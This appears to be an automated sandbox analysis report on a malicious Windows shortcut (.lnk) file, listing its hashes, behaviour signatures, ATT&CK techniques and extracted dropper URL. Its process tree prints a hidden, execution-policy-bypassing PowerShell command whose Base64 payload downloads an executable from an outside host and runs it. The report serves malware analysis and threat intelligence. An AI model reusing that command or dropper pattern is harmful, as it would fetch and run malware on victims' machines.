Analysis

  • max time kernel
    141s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 01:35

General

  • Target

    olineformN98898778.lnk

  • Size

    1KB

  • MD5

    04e0fea48dfed1e026c3104e0d6aff88

  • SHA1

    e639b0f5a486d5dffef28373ca2df867f99e7fb2

  • SHA256

    76a5649587a8874b1b1a5b3a37d281a4194e8a19947ca33f2d12d12d53509d39

  • SHA512

    c9e5ff0b7d9ddd4b47a57438115acd29338bc5c1e98c9a5f3a61405de90a43eea60c3b1ecf0c25326d4a506b4ae2e2970e794a2f5e1c4d911e89aeed73dbeba4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gpower.5gbfree.com/pix.exe

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\olineformN98898778.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:224
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABzAHQAYQByAHQAIAAiAHcAaQBuAGcAYQB0AC4AZQB4AGUAIgA7ACAAUwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIABoAHQAdABwADoALwAvAGcAcABvAHcAZQByAC4ANQBnAGIAZgByAGUAZQAuAGMAbwBtAC8AcABpAHgALgBlAHgAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXAB3AGkAbgBnAGEAdAAuAGUAeABlACIAOwAgAHMAdABhAHIAdAAgACIAJABlAG4AdgA6AFQARQBNAFAAXAB3AGkAbgBnAGEAdAAuAGUAeABlACIA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1272

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45ktjxny.0mz.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1272-2-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp
    Filesize

    8KB

  • memory/1272-3-0x000001D96BC80000-0x000001D96BCA2000-memory.dmp
    Filesize

    136KB

  • memory/1272-13-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
    Filesize

    10.8MB

  • memory/1272-14-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
    Filesize

    10.8MB

  • memory/1272-15-0x000001D96BC50000-0x000001D96BC76000-memory.dmp
    Filesize

    152KB

  • memory/1272-16-0x000001D96C120000-0x000001D96C134000-memory.dmp
    Filesize

    80KB

  • memory/1272-17-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
    Filesize

    10.8MB

  • memory/1272-18-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
    Filesize

    10.8MB

  • memory/1272-21-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
    Filesize

    10.8MB